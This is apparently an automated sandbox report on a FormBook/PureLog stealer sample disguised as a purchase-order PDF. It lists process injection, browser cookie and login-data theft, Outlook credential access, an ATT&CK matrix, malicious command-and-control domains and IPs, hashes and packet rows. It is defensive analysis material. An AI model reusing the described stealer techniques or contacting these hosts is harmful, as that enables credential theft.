Source: C:\Users\user\Desktop\PO 2025918 pdf.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2025918 pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\PO 2025918 pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

Source: C:\Windows\SysWOW64\ROUTE.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\ROUTE.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\ROUTE.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\ROUTE.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\ROUTE.EXE | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\ROUTE.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\ROUTE.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\ROUTE.EXE | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\ROUTE.EXE | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                      Remote Access Functionality

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
Behavior Graph ID: 1590629, Sample: PO 2025918 pdf.exe, Startdate: 14/01/2025, Architecture: WINDOWS, Score: 100

Sample-level nodes:
  DNS/IP: www.letsbookcruise.xyz (signature: Performs DNS queries to domains with low reputation)
  DNS/IP: zcdn.8383dns.com
  DNS/IP: 15 other IPs or domains
  Signature: Multi AV Scanner detection for submitted file
  Signature: Yara detected PureLog Stealer
  Signature: Yara detected FormBook
  Signature: 5 other signatures

Process tree:
  PO 2025918 pdf.exe (started)
    Dropped file: C:\Users\user\...\PO 2025918 pdf.exe.log, ASCII
    Signature: Adds a directory exclusion to Windows Defender
    Signature: Injects a PE file into a foreign processes
    PO 2025918 pdf.exe (started)
      Signature: Maps a DLL or memory area into another process
      mIrIhAjAJblou.exe (injected)
        Signature: Found direct / indirect Syscall (likely to bypass EDR)
        ROUTE.EXE (started)
          Signature: Tries to steal Mail credentials (via file / registry access)
          Signature: Tries to harvest and steal browser information (history, passwords, etc)
          Signature: Modifies the context of a thread in another process (thread injection)
          Signature: 3 other signatures
          mIrIhAjAJblou.exe (injected)
            Signature: Found direct / indirect Syscall (likely to bypass EDR)
            DNS/IP: www.qzsazi.info, 47.83.1.90, 49487, 49488, 49489, VODANETInternationalIP-BackboneofVodafoneDE, United States
            DNS/IP: www.actionhub.live, 67.223.117.189, 49475, 49476, 49477, VIMRO-AS15189US, United States
            DNS/IP: 7 other IPs or domains
          firefox.exe (started)
    powershell.exe (started)
      Signature: Loading BitLocker PowerShell Module
      conhost.exe (started)

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| PO 2025918 pdf.exe | 33% | Virustotal | | Browse |
| PO 2025918 pdf.exe | 34% | ReversingLabs | Win32.Virus.Virut | |
| PO 2025918 pdf.exe | 100% | Joe Sandbox ML | | |
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                                                      NameMaliciousAntivirus DetectionReputation
Name | Source | Malicious | Antivirus Detection | Reputation
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1590629
Start date and time: 2025-01-14 11:59:56 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 18s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO 2025918 pdf.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@10/7@12/9
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 90
• Number of non-executed functions: 283
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.109.210.53, 13.107.253.45, 13.95.31.18
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                              67.223.117.189foljNJ4bug.exeGet hashmaliciousFormBookBrowse
                                                                              • www.gutpox.life/bcpd/
                                                                              w64HYOhfv1.exeGet hashmaliciousFormBookBrowse
                                                                              • www.uburn.xyz/iqqs/
                                                                              enkJ6J7dAn.exeGet hashmaliciousFormBookBrowse
                                                                              • www.uburn.xyz/iqqs/
                                                                              PO-78140924.BAT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                              • www.heldhold.xyz/fava/
                                                                              rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                                                              • www.heldhold.xyz/fava/
                                                                              Enquiry.exeGet hashmaliciousFormBookBrowse
                                                                              • www.uburn.xyz/iqqs/
                                                                              AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                                                              • www.uburn.xyz/unks/
                                                                              ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                              • www.uburn.xyz/unks/
                                                                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                                                              • www.heldhold.xyz/fava/
                                                                              LisectAVT_2403002B_466.exeGet hashmaliciousFormBookBrowse
                                                                              • www.techstone.top/d5fo/
                                                                              188.114.97.3trow.exeGet hashmaliciousUnknownBrowse
                                                                              • www.ftchat.com/
                                                                              gem2.exeGet hashmaliciousUnknownBrowse
                                                                              • wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                                              qbSIgCrCgw.exeGet hashmaliciousFormBookBrowse
                                                                              • www.zkdamdjj.shop/kf1m/
                                                                              8L6MBxaJ2m.exeGet hashmaliciousFormBookBrowse
                                                                              • www.rtpwslot888gol.sbs/jmkz/
                                                                              1SxKeB4u0c.exeGet hashmaliciousFormBookBrowse
                                                                              • www.rgenerousrs.store/o362/
                                                                              suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                              • www.zkdamdjj.shop/swhs/
                                                                              k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                                              • www.einpisalpace.shop/8g74/?cNPH=WJ/rFpSuW7SUTonvHlYgJHet70+40/nSG+S456FFT70GKpWTD+yYW7KPXc3l6inPZ41lXlQU44ttBNcSIyPO/Awb2QEZq+eieNEXwOjUfdTJHvICblirwfj54bAbpLWz76fPuJmn0JFO&EtJTX=_JVX4ryxDRQpLJF
                                                                              wWXR5js3k2.exeGet hashmaliciousFormBookBrowse
                                                                              • www.supernutra01.online/rk61/
                                                                              NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                                              • www.vh5g.sbs/rjsl/
                                                                              KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                                              • www.beylikduzu616161.xyz/2nga/?xP7x=Q2EbwnYhq4vEVEYxQpNjsu4gFlGHCs4lBliPtc8X0AIyDwowOCFGn/661E09vvaaF3LvgpjgW8Wvr6GWd63ULodNNE679jqiZ5mYQ2jjCrjO82Z0/3agI7E=&F4=Q0yHy
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              zcdn.8383dns.comNew Order#12125.exeGet hashmaliciousFormBookBrowse
                                                                              • 134.122.135.48
                                                                              CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                              • 134.122.135.48
                                                                              CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                              • 134.122.135.48
                                                                              4p5XLVXJnq.exeGet hashmaliciousFormBookBrowse
                                                                              • 134.122.135.48
                                                                              k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                                              • 134.122.133.80
                                                                              9MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                                                                              • 134.122.133.80
                                                                              NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                                              • 134.122.133.80
                                                                              https://199.188.109.181Get hashmaliciousUnknownBrowse
                                                                              • 134.122.133.80
                                                                              0Z2lZiPk5K.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                              • 134.122.133.80
                                                                              DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                                              • 134.122.135.48
                                                                              natroredirect.natrocdn.comPayment Notification Confirmation Documents 09_01_2025 Paper bill.exeGet hashmaliciousFormBookBrowse
                                                                              • 85.159.66.93
                                                                              Payment Notification Confirmation 010_01_2025.exeGet hashmaliciousFormBookBrowse
                                                                              • 85.159.66.93
                                                                              HN1GiQ5tF7.exeGet hashmaliciousFormBookBrowse
                                                                              • 85.159.66.93
                                                                              bIcqeSVPW6.exeGet hashmaliciousFormBookBrowse
                                                                              • 85.159.66.93
                                                                              WBI835q8qr.exeGet hashmaliciousFormBookBrowse
                                                                              • 85.159.66.93
                                                                              1SxKeB4u0c.exeGet hashmaliciousFormBookBrowse
                                                                              • 85.159.66.93
                                                                              uG3I84bQEr.exeGet hashmaliciousFormBookBrowse
                                                                              • 85.159.66.93
                                                                              bkTW1FbgHN.exeGet hashmaliciousFormBookBrowse
                                                                              • 85.159.66.93
                                                                              3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                                              • 85.159.66.93
                                                                              KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                                              • 85.159.66.93
                                                                              www.vh5g.sbsNWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                                              • 188.114.97.3
                                                                              www.zucchini.proPayment Notification Confirmation Documents 09_01_2025 Paper bill.exeGet hashmaliciousFormBookBrowse
                                                                              • 199.59.243.228
                                                                              rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                                              • 199.59.243.228
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              No context
                                                                              No context
                                                                              Process:C:\Users\user\Desktop\PO 2025918 pdf.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1216
                                                                              Entropy (8bit):5.34331486778365
                                                                              Encrypted:false
                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                              Malicious:true
                                                                              Reputation:high, very likely benign file
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1172
                                                                              Entropy (8bit):5.342212839481937
                                                                              Encrypted:false
                                                                              SSDEEP:24:3s/WSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:c/WSU4y4RQmFoUeWmfmZ9tK8NDE
                                                                              MD5:395D1F25EA33C342138E822744147A4E
                                                                              SHA1:7A9152F83D625D1CF117D59E0BB24D121FEE7070
                                                                              SHA-256:A82619AD08B159A97F7E88F36EADFAFB9B9CCEB12510C8F10D6E94AC07D8EF70
                                                                              SHA-512:456B8B2B4F85C0378E879B3ECC108FE1D7C88A2DF375847795C5BAA700F28059F9E66D1D4326F2FFE1F663CF5A027D8B108213F15D365E8410644EB56C71526F
                                                                              Malicious:false
                                                                              Process:C:\Windows\SysWOW64\ROUTE.EXE
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                              Category:dropped
                                                                              Size (bytes):196608
                                                                              Entropy (8bit):1.121297215059106
                                                                              Encrypted:false
                                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                              Malicious:false
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):7.753200255509009
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                              File name:PO 2025918 pdf.exe
                                                                              File size:765'952 bytes
                                                                              MD5:625d2fae7b900a58c7e9daed1f85cab3
                                                                              SHA1:6c61eb8e5851778e4ed57044c50442dae2b875bd
                                                                              SHA256:d1a82af2d052117e637c17671568650659a93541083f107e4d1b2d357935928d
                                                                              SHA512:19ef418977acc405e15d90bcd2df26e2166824b7e142c8672acdc8f12ab0e50669aac0002c54587353fe1a92fcdbe5c7716191e5f4d9ed0726f4780f65253ffc
                                                                              SSDEEP:12288:wYRxA4Y5lyA/BxSPCj6HGXjxU70KoJZTb0r4d2SS8Kgqy4wenbJuuCkq64Qxhrok:nRnSWw9Ld2SA3n940hERompRZzK
                                                                              TLSH:30F40258632DE907C0621BB44932D3F823B59E89A621C7139BED3EFFBC76B462914351
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................... ............@................................
                                                                              Icon Hash:00928e8e8686b000
                                                                              Entrypoint:0x4bc416
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x8AEDD8A2 [Wed Nov 11 08:28:18 2043 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              call far 0000h : 003E9999h
                                                                              aas
                                                                              int CCh
                                                                              dec esp
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc3c3 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xbe000 | 0x5e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc0000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xbabf4 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xba42c | 0xba600 | df9384085315899193145442a4f25db6 | False | 0.9214387889839034 | data | 7.75981250034453 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xbe000 | 0x5e0 | 0x600 | 47901c52e8fbf9c7b3da43929a8006b8 | False | 0.4329427083333333 | data | 4.167562861508636 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc0000 | 0xc | 0x200 | 170dcdc63460337693c79a488cb7d376 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xbe090 | 0x350 | data | | | 0.4257075471698113
RT_MANIFEST | 0xbe3f0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347

DLL | Import
mscoree.dll | _CorExeMain

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                              Jan 14, 2025 12:02:24.713557959 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:24.713666916 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.282552004 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.282625914 CET804947767.223.117.189192.168.2.5
                                                                              Jan 14, 2025 12:02:25.282660961 CET804947767.223.117.189192.168.2.5
